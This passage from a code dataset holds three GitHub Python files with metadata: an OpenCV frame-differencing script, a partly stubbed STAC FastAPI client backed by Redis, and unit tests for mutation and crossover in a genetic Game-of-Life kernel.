cv2.VideoCapture(\"C:\\\\vscode\\\\Teknofest\\\\klasor11\\\\car.mp4\")\n\n_,first_frame = cap.read()\n\nfirst_frame =cv2.resize(first_frame,(640,480))\n\nfirst_gray = cv2.cvtColor(first_frame,cv2.COLOR_BGR2GRAY) \n\nfirst_gray = cv2.GaussianBlur(first_gray,(5,5),0)\n\n\nwhile 1 :\n\n _,frame = cap.read()\n frame = cv2.resize(frame,(640,480))\n\n gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY) \n\n gray = 
cv2.GaussianBlur(gray,(5,5),0)\n\n    diff = cv2.absdiff(first_gray,gray) # compares every subsequent frame against the first frame, one by one\n\n    _,diff = cv2.threshold(diff,25,255,cv2.THRESH_BINARY)\n\n\n\n    cv2.imshow(\"frame\",frame)\n    cv2.imshow(\"first\",first_frame)\n    cv2.imshow(\"diff\",diff)\n\n    if cv2.waitKey(20) & 0xFF == ord(\"q\"):\n        break\n\n\n\n\ncap.release()\ncv2.destroyAllWindows()\n", "repo_name": "Yusufygc/GoruntuIsleme", "sub_path": "klasor11/arka_plan_cikarma.py", "file_name": "arka_plan_cikarma.py", "file_ext": "py", "file_size_in_byte": 868, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.VideoCapture", "line_number": 4, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 10, "usage_type": "attribute"}, {"api_name": "cv2.GaussianBlur", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 20, "usage_type": "attribute"}, {"api_name": "cv2.GaussianBlur", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.absdiff", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.threshold", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 26, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "41945684991", "text": "\"\"\"Item crud client.\"\"\"\nimport json\nimport logging\nfrom datetime import datetime\nfrom typing import List, Optional, Type, Union\nfrom urllib.parse import urljoin\n\nimport attr\nfrom fastapi import HTTPException\n\n# from geojson_pydantic.geometries import Polygon\nfrom pydantic import ValidationError\nfrom stac_pydantic.links import Relations\nfrom stac_pydantic.shared import MimeTypes\n\nfrom stac_fastapi.nodb import serializers\nfrom stac_fastapi.nodb.config import Tile38Settings\nfrom stac_fastapi.nodb.session import Session\nfrom stac_fastapi.nodb.transactions import COLLECTIONS\n\nfrom stac_fastapi.types.core import BaseCoreClient\nfrom stac_fastapi.types.errors import NotFoundError\nfrom stac_fastapi.types.search import BaseSearchPostRequest\nfrom stac_fastapi.types.stac import Collection, Collections, Item, ItemCollection\nfrom stac_fastapi.nodb.transactions import COLLECTIONS\n\nlogger = logging.getLogger(__name__)\n\nNumType = Union[float, int]\n\n\n@attr.s\nclass CoreCrudClient(BaseCoreClient):\n    \"\"\"Client for core endpoints defined by stac.\"\"\"\n\n    session: Session = attr.ib(default=attr.Factory(Session.create_from_env))\n    item_serializer: Type[serializers.Serializer] = attr.ib(\n        default=serializers.ItemSerializer\n    )\n    collection_serializer: Type[serializers.Serializer] = attr.ib(\n        default=serializers.CollectionSerializer\n    )\n    settings = Tile38Settings()\n    client = settings.create_tile_38_client\n    redis_client = settings.create_redis_client\n\n    
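The background-subtraction record above never checks the boolean returned by `cap.read()`, so it would crash on a `None` frame once the video ends. A defensive sketch of the same loop (hypothetical video path; a display is assumed for `imshow`):

```python
import cv2

cap = cv2.VideoCapture("car.mp4")  # hypothetical path
ok, first = cap.read()
if ok:
    first_gray = cv2.GaussianBlur(cv2.cvtColor(first, cv2.COLOR_BGR2GRAY), (5, 5), 0)
    while True:
        ok, frame = cap.read()
        if not ok:  # end of stream reached
            break
        gray = cv2.GaussianBlur(cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY), (5, 5), 0)
        _, diff = cv2.threshold(cv2.absdiff(first_gray, gray), 25, 255, cv2.THRESH_BINARY)
        cv2.imshow("diff", diff)
        if cv2.waitKey(20) & 0xFF == ord("q"):
            break
cap.release()
cv2.destroyAllWindows()
```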
@staticmethod\n def _lookup_id(id: str, table, session):\n \"\"\"Lookup row by id.\"\"\"\n pass\n\n def all_collections(self, **kwargs) -> Collections:\n \"\"\"Read all collections from the database.\"\"\"\n base_url = str(kwargs[\"request\"].base_url)\n collections = []\n collection_ids = self.redis_client.smembers(\"collections\")\n\n for collection in collection_ids:\n collections.append(self.redis_client.json().get(collection))\n\n if len(collections) == 0:\n raise NotFoundError(\"No collections exist\")\n serialized_collections = [\n self.collection_serializer.db_to_stac(\n collection, base_url=base_url\n )\n for collection in collections\n ]\n links = [\n {\n \"rel\": Relations.root.value,\n \"type\": MimeTypes.json,\n \"href\": base_url,\n },\n {\n \"rel\": Relations.parent.value,\n \"type\": MimeTypes.json,\n \"href\": base_url,\n },\n {\n \"rel\": Relations.self.value,\n \"type\": MimeTypes.json,\n \"href\": urljoin(base_url, \"collections\"),\n },\n ]\n collection_list = Collections(\n collections=serialized_collections or [], links=links\n )\n return collection_list\n\n def get_collection(self, collection_id: str, **kwargs) -> Collection:\n \"\"\"Get collection by id.\"\"\"\n base_url = str(kwargs[\"request\"].base_url)\n\n collection = self.redis_client.json().get(collection_id)\n if collection:\n return self.collection_serializer.db_to_stac(collection, base_url)\n else:\n raise NotFoundError(f\"Collection {collection_id} not found\")\n\n def item_collection(\n self, collection_id: str, limit: int = 10, **kwargs\n ) -> ItemCollection:\n \"\"\"Read an item collection from the database.\"\"\"\n pass\n # links = []\n # base_url = str(kwargs[\"request\"].base_url)\n # search = Search(using=self.client, index=\"stac_items\")\n\n # collection_filter = Q(\n # \"bool\", should=[Q(\"match_phrase\", **{\"collection\": collection_id})]\n # )\n # search = search.query(collection_filter)\n # try:\n # count = search.count()\n # except elasticsearch.exceptions.NotFoundError:\n # raise NotFoundError(\"No items exist\")\n # # search = search.sort({\"id.keyword\" : {\"order\" : \"asc\"}})\n # search = search.query()[0:limit]\n # collection_children = search.execute().to_dict()\n\n # serialized_children = [\n # self.item_serializer.db_to_stac(item[\"_source\"], base_url=base_url)\n # for item in collection_children[\"hits\"][\"hits\"]\n # ]\n\n # context_obj = None\n # if self.extension_is_enabled(\"ContextExtension\"):\n # context_obj = {\n # \"returned\": count if count < limit else limit,\n # \"limit\": limit,\n # \"matched\": count,\n # }\n\n # return ItemCollection(\n # type=\"FeatureCollection\",\n # features=serialized_children,\n # links=links,\n # context=context_obj,\n # )\n\n def get_item(self, item_id: str, collection_id: str, **kwargs) -> Item:\n \"\"\"Get item by item id, collection id.\"\"\"\n base_url = str(kwargs[\"request\"].base_url)\n item = self.redis_client.json().get(item_id)\n if item:\n return self.item_serializer.db_to_stac(item, base_url)\n else:\n raise NotFoundError(f\"Item {item_id} does not exist in Collection {collection_id}\")\n\n # def _return_date(self, datetime):\n # datetime = datetime.split(\"/\")\n # if len(datetime) == 1:\n # datetime = datetime[0][0:19] + \"Z\"\n # return {\"eq\": datetime}\n # else:\n # start_date = datetime[0]\n # end_date = datetime[1]\n # if \"..\" not in datetime:\n # start_date = start_date[0:19] + \"Z\"\n # end_date = end_date[0:19] + \"Z\"\n # elif start_date != \"..\":\n # start_date = start_date[0:19] + \"Z\"\n # end_date = 
\"2200-12-01T12:31:12Z\"\n # elif end_date != \"..\":\n # start_date = \"1900-10-01T00:00:00Z\"\n # end_date = end_date[0:19] + \"Z\"\n # else:\n # start_date = \"1900-10-01T00:00:00Z\"\n # end_date = \"2200-12-01T12:31:12Z\"\n\n # return {\"lte\": end_date, \"gte\": start_date}\n\n def get_search(\n self,\n collections: Optional[List[str]] = None,\n ids: Optional[List[str]] = None,\n bbox: Optional[List[NumType]] = None,\n datetime: Optional[Union[str, datetime]] = None,\n limit: Optional[int] = 10,\n query: Optional[str] = None,\n token: Optional[str] = None,\n fields: Optional[List[str]] = None,\n sortby: Optional[str] = None,\n **kwargs,\n ) -> ItemCollection:\n \"\"\"GET search catalog.\"\"\"\n pass\n # base_args = {\n # \"collections\": collections,\n # \"ids\": ids,\n # \"bbox\": bbox,\n # \"limit\": limit,\n # \"token\": token,\n # \"query\": json.loads(query) if query else query,\n # }\n # if datetime:\n # base_args[\"datetime\"] = datetime\n # if sortby:\n # # https://github.com/radiantearth/stac-spec/tree/master/api-spec/extensions/sort#http-get-or-post-form\n # sort_param = []\n # for sort in sortby:\n # sort_param.append(\n # {\n # \"field\": sort[1:],\n # \"direction\": \"asc\" if sort[0] == \"+\" else \"desc\",\n # }\n # )\n # base_args[\"sortby\"] = sort_param\n\n # # if fields:\n # # includes = set()\n # # excludes = set()\n # # for field in fields:\n # # if field[0] == \"-\":\n # # excludes.add(field[1:])\n # # elif field[0] == \"+\":\n # # includes.add(field[1:])\n # # else:\n # # includes.add(field)\n # # base_args[\"fields\"] = {\"include\": includes, \"exclude\": excludes}\n\n # # Do the request\n # try:\n # search_request = self.post_request_model(**base_args)\n # except ValidationError:\n # raise HTTPException(status_code=400, detail=\"Invalid parameters provided\")\n # resp = self.post_search(search_request, request=kwargs[\"request\"])\n\n # return resp\n\n # def bbox2poly(self, b0, b1, b2, b3):\n # \"\"\"Transform bbox to polygon.\"\"\"\n # poly = [[[b0, b1], [b2, b1], [b2, b3], [b0, b3], [b0, b1]]]\n # return poly\n\n def post_search(\n self, search_request: BaseSearchPostRequest, **kwargs\n ) -> ItemCollection:\n \"\"\"POST search catalog.\"\"\"\n pass\n # base_url = str(kwargs[\"request\"].base_url)\n # search = Search(using=self.client, index=\"stac_items\")\n\n # if search_request.query:\n # if type(search_request.query) == str:\n # search_request.query = json.loads(search_request.query)\n # for (field_name, expr) in search_request.query.items():\n # field = \"properties__\" + field_name\n # for (op, value) in expr.items():\n # if op != \"eq\":\n # key_filter = {field: {f\"{op}\": value}}\n # search = search.query(Q(\"range\", **key_filter))\n # else:\n # search = search.query(\"match_phrase\", **{field: value})\n\n # if search_request.ids:\n # id_list = []\n # for item_id in search_request.ids:\n # id_list.append(Q(\"match_phrase\", **{\"id\": item_id}))\n # id_filter = Q(\"bool\", should=id_list)\n # search = search.query(id_filter)\n\n # if search_request.collections:\n # collection_list = []\n # for collection_id in search_request.collections:\n # collection_list.append(\n # Q(\"match_phrase\", **{\"collection\": collection_id})\n # )\n # collection_filter = Q(\"bool\", should=collection_list)\n # search = search.query(collection_filter)\n\n # if search_request.datetime:\n # datetime_search = self._return_date(search_request.datetime)\n # if \"eq\" in datetime_search:\n # search = search.query(\n # \"match_phrase\", **{\"properties__datetime\": 
datetime_search[\"eq\"]}\n # )\n # else:\n # search = search.filter(\n # \"range\", properties__datetime={\"lte\": datetime_search[\"lte\"]}\n # )\n # search = search.filter(\n # \"range\", properties__datetime={\"gte\": datetime_search[\"gte\"]}\n # )\n\n # if search_request.bbox:\n # bbox = search_request.bbox\n # if len(bbox) == 6:\n # bbox = [bbox[0], bbox[1], bbox[3], bbox[4]]\n # poly = self.bbox2poly(bbox[0], bbox[1], bbox[2], bbox[3])\n\n # bbox_filter = Q(\n # {\n # \"geo_shape\": {\n # \"geometry\": {\n # \"shape\": {\"type\": \"polygon\", \"coordinates\": poly},\n # \"relation\": \"intersects\",\n # }\n # }\n # }\n # )\n # search = search.query(bbox_filter)\n\n # if search_request.intersects:\n # intersect_filter = Q(\n # {\n # \"geo_shape\": {\n # \"geometry\": {\n # \"shape\": {\n # \"type\": search_request.intersects.type.lower(),\n # \"coordinates\": search_request.intersects.coordinates,\n # },\n # \"relation\": \"intersects\",\n # }\n # }\n # }\n # )\n # search = search.query(intersect_filter)\n\n # if search_request.sortby:\n # for sort in search_request.sortby:\n # if sort.field == \"datetime\":\n # sort.field = \"properties__datetime\"\n # field = sort.field + \".keyword\"\n # search = search.sort({field: {\"order\": sort.direction}})\n\n # try:\n # count = search.count()\n # except elasticsearch.exceptions.NotFoundError:\n # raise NotFoundError(\"No items exist\")\n\n # # search = search.sort({\"id.keyword\" : {\"order\" : \"asc\"}})\n # search = search.query()[0 : search_request.limit]\n # response = search.execute().to_dict()\n\n # if len(response[\"hits\"][\"hits\"]) > 0:\n # response_features = [\n # self.item_serializer.db_to_stac(item[\"_source\"], base_url=base_url)\n # for item in response[\"hits\"][\"hits\"]\n # ]\n # else:\n # response_features = []\n\n # # if self.extension_is_enabled(\"FieldsExtension\"):\n # # if search_request.query is not None:\n # # query_include: Set[str] = set(\n # # [\n # # k if k in Settings.get().indexed_fields else f\"properties.{k}\"\n # # for k in search_request.query.keys()\n # # ]\n # # )\n # # if not search_request.fields.include:\n # # search_request.fields.include = query_include\n # # else:\n # # search_request.fields.include.union(query_include)\n\n # # filter_kwargs = search_request.fields.filter_fields\n\n # # response_features = [\n # # json.loads(stac_pydantic.Item(**feat).json(**filter_kwargs))\n # # for feat in response_features\n # # ]\n\n # if search_request.limit:\n # limit = search_request.limit\n # response_features = response_features[0:limit]\n # else:\n # limit = 10\n # response_features = response_features[0:limit]\n # limit = 10\n # context_obj = None\n # if self.extension_is_enabled(\"ContextExtension\"):\n # context_obj = {\n # \"returned\": count if count < limit else limit,\n # \"limit\": limit,\n # \"matched\": count,\n # }\n\n # links = []\n # return ItemCollection(\n # type=\"FeatureCollection\",\n # features=response_features,\n # links=links,\n # context=context_obj,\n # )\n", "repo_name": "jonhealy1/stac-fastapi-nodb", "sub_path": "stac_fastapi/nodb/stac_fastapi/nodb/core.py", "file_name": "core.py", "file_ext": "py", "file_size_in_byte": 14437, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 27, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 29, "usage_type": "name"}, {"api_name": "stac_fastapi.types.core.BaseCoreClient", "line_number": 33, "usage_type": 
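The commented-out `_return_date` helper in the STAC record above maps a datetime string to a range filter: a single timestamp becomes an equality match, and a `start/end` interval with `..` leaves one side open. The same logic as a standalone sketch (sentinel dates copied from the original):

```python
def return_date(value: str) -> dict:
    parts = value.split("/")
    if len(parts) == 1:
        return {"eq": parts[0][0:19] + "Z"}
    start, end = parts
    start = "1900-10-01T00:00:00Z" if start == ".." else start[0:19] + "Z"
    end = "2200-12-01T12:31:12Z" if end == ".." else end[0:19] + "Z"
    return {"gte": start, "lte": end}

print(return_date("2021-01-01T00:00:00/.."))
# {'gte': '2021-01-01T00:00:00Z', 'lte': '2200-12-01T12:31:12Z'}
```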
"name"}, {"api_name": "stac_fastapi.nodb.session.Session", "line_number": 36, "usage_type": "name"}, {"api_name": "attr.ib", "line_number": 36, "usage_type": "call"}, {"api_name": "attr.Factory", "line_number": 36, "usage_type": "call"}, {"api_name": "stac_fastapi.nodb.session.Session.create_from_env", "line_number": 36, "usage_type": "attribute"}, {"api_name": "typing.Type", "line_number": 37, "usage_type": "name"}, {"api_name": "stac_fastapi.nodb.serializers.Serializer", "line_number": 37, "usage_type": "attribute"}, {"api_name": "stac_fastapi.nodb.serializers", "line_number": 37, "usage_type": "name"}, {"api_name": "attr.ib", "line_number": 37, "usage_type": "call"}, {"api_name": "stac_fastapi.nodb.serializers.ItemSerializer", "line_number": 38, "usage_type": "attribute"}, {"api_name": "stac_fastapi.nodb.serializers", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 40, "usage_type": "name"}, {"api_name": "stac_fastapi.nodb.serializers.Serializer", "line_number": 40, "usage_type": "attribute"}, {"api_name": "stac_fastapi.nodb.serializers", "line_number": 40, "usage_type": "name"}, {"api_name": "attr.ib", "line_number": 40, "usage_type": "call"}, {"api_name": "stac_fastapi.nodb.serializers.CollectionSerializer", "line_number": 41, "usage_type": "attribute"}, {"api_name": "stac_fastapi.nodb.serializers", "line_number": 41, "usage_type": "name"}, {"api_name": "stac_fastapi.nodb.config.Tile38Settings", "line_number": 43, "usage_type": "call"}, {"api_name": "stac_fastapi.types.errors.NotFoundError", "line_number": 62, "usage_type": "call"}, {"api_name": "stac_pydantic.links.Relations.root", "line_number": 71, "usage_type": "attribute"}, {"api_name": "stac_pydantic.links.Relations", "line_number": 71, "usage_type": "name"}, {"api_name": "stac_pydantic.shared.MimeTypes.json", "line_number": 72, "usage_type": "attribute"}, {"api_name": "stac_pydantic.shared.MimeTypes", "line_number": 72, "usage_type": "name"}, {"api_name": "stac_pydantic.links.Relations.parent", "line_number": 76, "usage_type": "attribute"}, {"api_name": "stac_pydantic.links.Relations", "line_number": 76, "usage_type": "name"}, {"api_name": "stac_pydantic.shared.MimeTypes.json", "line_number": 77, "usage_type": "attribute"}, {"api_name": "stac_pydantic.shared.MimeTypes", "line_number": 77, "usage_type": "name"}, {"api_name": "stac_pydantic.links.Relations.self", "line_number": 81, "usage_type": "attribute"}, {"api_name": "stac_pydantic.links.Relations", "line_number": 81, "usage_type": "name"}, {"api_name": "stac_pydantic.shared.MimeTypes.json", "line_number": 82, "usage_type": "attribute"}, {"api_name": "stac_pydantic.shared.MimeTypes", "line_number": 82, "usage_type": "name"}, {"api_name": "urllib.parse.urljoin", "line_number": 83, "usage_type": "call"}, {"api_name": "stac_fastapi.types.stac.Collections", "line_number": 86, "usage_type": "call"}, {"api_name": "stac_fastapi.types.stac.Collections", "line_number": 52, "usage_type": "name"}, {"api_name": "stac_fastapi.types.errors.NotFoundError", "line_number": 99, "usage_type": "call"}, {"api_name": "stac_fastapi.types.stac.Collection", "line_number": 91, "usage_type": "name"}, {"api_name": "stac_fastapi.types.stac.ItemCollection", "line_number": 103, "usage_type": "name"}, {"api_name": "stac_fastapi.types.errors.NotFoundError", "line_number": 149, "usage_type": "call"}, {"api_name": "stac_fastapi.types.stac.Item", "line_number": 142, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 176, "usage_type": "name"}, 
{"api_name": "typing.List", "line_number": 176, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 177, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 177, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 178, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 178, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 179, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 179, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 179, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 180, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 181, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 182, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 183, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 183, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 184, "usage_type": "name"}, {"api_name": "stac_fastapi.types.stac.ItemCollection", "line_number": 186, "usage_type": "name"}, {"api_name": "stac_fastapi.types.search.BaseSearchPostRequest", "line_number": 238, "usage_type": "name"}, {"api_name": "stac_fastapi.types.stac.ItemCollection", "line_number": 239, "usage_type": "name"}, {"api_name": "attr.s", "line_number": 32, "usage_type": "attribute"}]} +{"seq_id": "39906581774", "text": "\"\"\"Tests for kernel/reproduction.h\n\nThese tests are meant to document behavior and provide basic validation.\n\"\"\"\n\nimport random\nimport unittest\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport gif_files\nfrom kernel import (\n breed_population,\n Cell, GenotypeDType,\n CELLS_PER_STAMP, CROSSOVER_RATE, MUTATION_RATE, NUM_GENES, STAMP_SIZE)\nfrom evolution import TestClade, NUM_SPECIES, NUM_TRIALS, NUM_ORGANISMS\nfrom tests import test_case\n\n\ndef visualize_genotype(genotype):\n \"\"\"Render a Genotype as a plt figure with images.\"\"\"\n cols = NUM_GENES\n fig = plt.figure(\"Genotype\")\n for gene_index in range(cols):\n axis = fig.add_subplot(2, cols, gene_index + 1)\n # Make a primitive bar chart representing the Scalar genes\n # that's the same width and appearance as a Stamp gene value.\n scale_factor = (1 << 32) / STAMP_SIZE\n raw_value = genotype['scalar_genes'][gene_index]\n scaled_value = int(raw_value / scale_factor)\n scalar_viz = np.pad(\n np.full((2, scaled_value), 0x00, dtype=np.uint8),\n ((0, 0), (0, STAMP_SIZE - scaled_value)),\n constant_values=0xFF)\n gif_files.add_simulation_data_to_figure(scalar_viz, fig, axis)\n axis.set_title(f'{100 * raw_value / (0xFFFFFFFF):0.2f}%')\n for gene_index in range(cols):\n axis = fig.add_subplot(2, cols, cols + gene_index + 1)\n gif_files.add_simulation_data_to_figure(\n genotype['stamp_genes'][gene_index], fig, axis)\n\n\nclass TestReproduction(test_case.TestCase):\n \"\"\"Tests for initializing and breeding populations of Genotypes.\"\"\"\n\n def test_randomize(self):\n \"\"\"Random genes have the expected distributional properties.\"\"\"\n clade = TestClade()\n clade.populate_simulator()\n genotypes = clade.simulator.get_genotypes()\n # For every trial, look at the genes of all the organisms in that\n # population and make sure they are randomized appropriately.\n for species_index in range(NUM_SPECIES):\n for trial_index in range(NUM_TRIALS):\n organism_genotypes = genotypes[species_index][trial_index]\n scalar_values = organism_genotypes['scalar_genes'].flatten()\n stamp_values = 
organism_genotypes['stamp_genes'].flatten()\n msg = f'species {species_index}, trial {trial_index}'\n # Scalar genes are 50% of their max value, on average.\n self.assertProportional(\n 1 << 31, scalar_values.mean(), delta=0.11, msg=msg)\n # Scalar gene values are almost all unique, since few values\n # are being drawn from the full range of 32-bit ints.\n self.assertAlmostEqual(\n NUM_ORGANISMS * NUM_GENES,\n np.unique(scalar_values).size,\n delta=0.01, msg=msg)\n # The average stamp value is halfway between ALIVE and DEAD.\n self.assertProportional(\n (int(Cell.DEAD) + int(Cell.ALIVE)) / 2,\n stamp_values.mean(),\n 0.2, msg=msg)\n # About half of the stamp values are ALIVE.\n self.assertProportional(\n len(stamp_values) / 2,\n np.count_nonzero(stamp_values == int(Cell.ALIVE)),\n 0.2, msg=msg)\n # All stamp values are either ALIVE or DEAD.\n self.assertEqual(\n len(stamp_values),\n np.count_nonzero(\n np.logical_or(\n stamp_values == int(Cell.ALIVE),\n stamp_values == int(Cell.DEAD))))\n\n def test_sample_random_genotypes(self):\n \"\"\"Collect visualizations of random genotypes to verify manually.\"\"\"\n num_organisms = 8\n clade = TestClade()\n clade.populate_simulator()\n genotypes = clade.simulator.get_genotypes()\n for organism_index in range(num_organisms):\n visualize_genotype(genotypes[0][0][organism_index])\n path, test_name = self.get_test_data_location()\n # SVG would be a better graphics format, but the pyplot library has\n # a bug where SVG file outputs are not deterministic.\n plt.savefig(f'{path}/{test_name}{organism_index}.png')\n plt.close()\n\n def test_reproducibility(self):\n \"\"\"The same seed produces the same pseudorandom genotypes.\"\"\"\n def single_trial():\n result = {}\n clade = TestClade()\n clade.populate_simulator()\n result['before'] = clade.simulator.get_genotypes()\n clade.simulator.propagate()\n result['after'] = clade.simulator.get_genotypes()\n return result\n num_trials = 3\n results = [single_trial() for _ in range(num_trials)]\n prototype = results.pop()\n for result in results:\n self.assertArrayEqual(\n prototype['before']['scalar_genes'],\n result['before']['scalar_genes'])\n self.assertArrayEqual(\n prototype['before']['stamp_genes'],\n result['before']['stamp_genes'])\n self.assertArrayEqual(\n prototype['after']['scalar_genes'],\n result['after']['scalar_genes'])\n self.assertArrayEqual(\n prototype['after']['stamp_genes'],\n result['after']['stamp_genes'])\n\n def test_mutations(self):\n \"\"\"Genes mutate during reproduction as expected.\"\"\"\n # Use a larger population size so we'll get enough mutations to\n # measure with some precision.\n num_species, num_trials, num_organisms = 32, 32, 32\n population_size = num_species * num_trials * num_organisms\n\n # Set all Genotype values to 0 and have every organism breed with\n # itself. 
Any non-zero values are the result of mutations.\n genotypes = np.zeros(\n (num_species, num_trials, num_organisms), dtype=GenotypeDType)\n parent_selections = list(range(population_size))\n mate_selections = parent_selections\n\n # Actually do the breeding\n genotypes = breed_population(\n genotypes, parent_selections, mate_selections)\n scalar_values = genotypes['scalar_genes'].flatten()\n stamp_values = genotypes['stamp_genes'].flatten()\n\n # Assert mutation rate is as expected.\n self.assertProportional(\n MUTATION_RATE * NUM_GENES * population_size,\n np.count_nonzero(scalar_values),\n delta=0.1)\n alive_probability = 0.5\n self.assertProportional(\n (MUTATION_RATE * NUM_GENES * CELLS_PER_STAMP *\n population_size * alive_probability),\n np.count_nonzero(stamp_values),\n delta=0.1)\n\n def test_crossover(self):\n \"\"\"Reproduction uses crossover at the expected rate.\"\"\"\n num_species, num_trials, num_organisms = 5, 5, 32\n half_organisms = int(num_organisms / 2)\n population_size = num_species * num_trials * num_organisms\n\n # Set up Genotypes and select organisms such that each parent has all\n # of its genes set to its max value and each mate has all its genes set\n # to a low value. Then we can see how many genes from parents and mates\n # make it through the breeding process.\n parent_selections = []\n mate_selections = []\n population_index = 0\n genotypes = np.empty(\n (num_species, num_trials, num_organisms), dtype=GenotypeDType)\n for species_index in range(num_species):\n for trial_index in range(num_trials):\n for organism_index in range(num_organisms):\n genotype = (\n genotypes[species_index][trial_index][organism_index])\n if organism_index < half_organisms:\n genotype['scalar_genes'].fill(0xFFFFFFFF)\n genotype['stamp_genes'].fill(0xFF)\n parent_selections.append(population_index)\n mate_selections.append(\n population_index + half_organisms)\n else:\n genotype['scalar_genes'].fill(0x00000000)\n genotype['stamp_genes'].fill(0x00)\n parent_selections.append(\n population_index - half_organisms)\n mate_selections.append(population_index)\n population_index += 1\n\n # Actually do the breeding.\n genotypes = breed_population(\n genotypes, parent_selections, mate_selections)\n scalar_values = genotypes['scalar_genes'].flatten()\n stamp_values = genotypes['stamp_genes'].flatten()\n\n # Assert that genes got remixed as expected. Note, rather than\n # computing expected values that take mutation rates into account, we\n # just set slightly looser bounds. This works pretty well since the\n # crossover rate is much greater than the mutation rate.\n # If there was no crossover, all genes come from parent. 
If there was\n # crossover, 50% of genes come from parent.\n parent_gene_rate = (\n (1 - CROSSOVER_RATE) + 0.5 * CROSSOVER_RATE)\n self.assertProportional(\n parent_gene_rate * NUM_GENES * population_size,\n np.count_nonzero(scalar_values),\n delta=0.02)\n self.assertProportional(\n (parent_gene_rate * NUM_GENES * CELLS_PER_STAMP * population_size),\n np.count_nonzero(stamp_values),\n delta=0.02)\n\n\nif __name__ == '__main__':\n unittest.main()\n", "repo_name": "ngaylinn/epigenetic-gol-v1-wip", "sub_path": "tests/test_reproduction.py", "file_name": "test_reproduction.py", "file_ext": "py", "file_size_in_byte": 9801, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "kernel.NUM_GENES", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "kernel.STAMP_SIZE", "line_number": 29, "usage_type": "name"}, {"api_name": "numpy.pad", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 33, "usage_type": "attribute"}, {"api_name": "kernel.STAMP_SIZE", "line_number": 34, "usage_type": "name"}, {"api_name": "gif_files.add_simulation_data_to_figure", "line_number": 36, "usage_type": "call"}, {"api_name": "gif_files.add_simulation_data_to_figure", "line_number": 40, "usage_type": "call"}, {"api_name": "tests.test_case.TestCase", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tests.test_case", "line_number": 44, "usage_type": "name"}, {"api_name": "evolution.TestClade", "line_number": 49, "usage_type": "call"}, {"api_name": "evolution.NUM_SPECIES", "line_number": 54, "usage_type": "argument"}, {"api_name": "evolution.NUM_TRIALS", "line_number": 55, "usage_type": "argument"}, {"api_name": "evolution.NUM_ORGANISMS", "line_number": 66, "usage_type": "name"}, {"api_name": "kernel.NUM_GENES", "line_number": 66, "usage_type": "name"}, {"api_name": "numpy.unique", "line_number": 67, "usage_type": "call"}, {"api_name": "kernel.Cell.DEAD", "line_number": 71, "usage_type": "attribute"}, {"api_name": "kernel.Cell", "line_number": 71, "usage_type": "name"}, {"api_name": "kernel.Cell.ALIVE", "line_number": 71, "usage_type": "attribute"}, {"api_name": "numpy.count_nonzero", "line_number": 77, "usage_type": "call"}, {"api_name": "kernel.Cell.ALIVE", "line_number": 77, "usage_type": "attribute"}, {"api_name": "kernel.Cell", "line_number": 77, "usage_type": "name"}, {"api_name": "numpy.count_nonzero", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.logical_or", "line_number": 83, "usage_type": "call"}, {"api_name": "kernel.Cell.ALIVE", "line_number": 84, "usage_type": "attribute"}, {"api_name": "kernel.Cell", "line_number": 84, "usage_type": "name"}, {"api_name": "kernel.Cell.DEAD", "line_number": 85, "usage_type": "attribute"}, {"api_name": "kernel.Cell", "line_number": 85, "usage_type": "name"}, {"api_name": "evolution.TestClade", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "evolution.TestClade", "line_number": 105, "usage_type": 
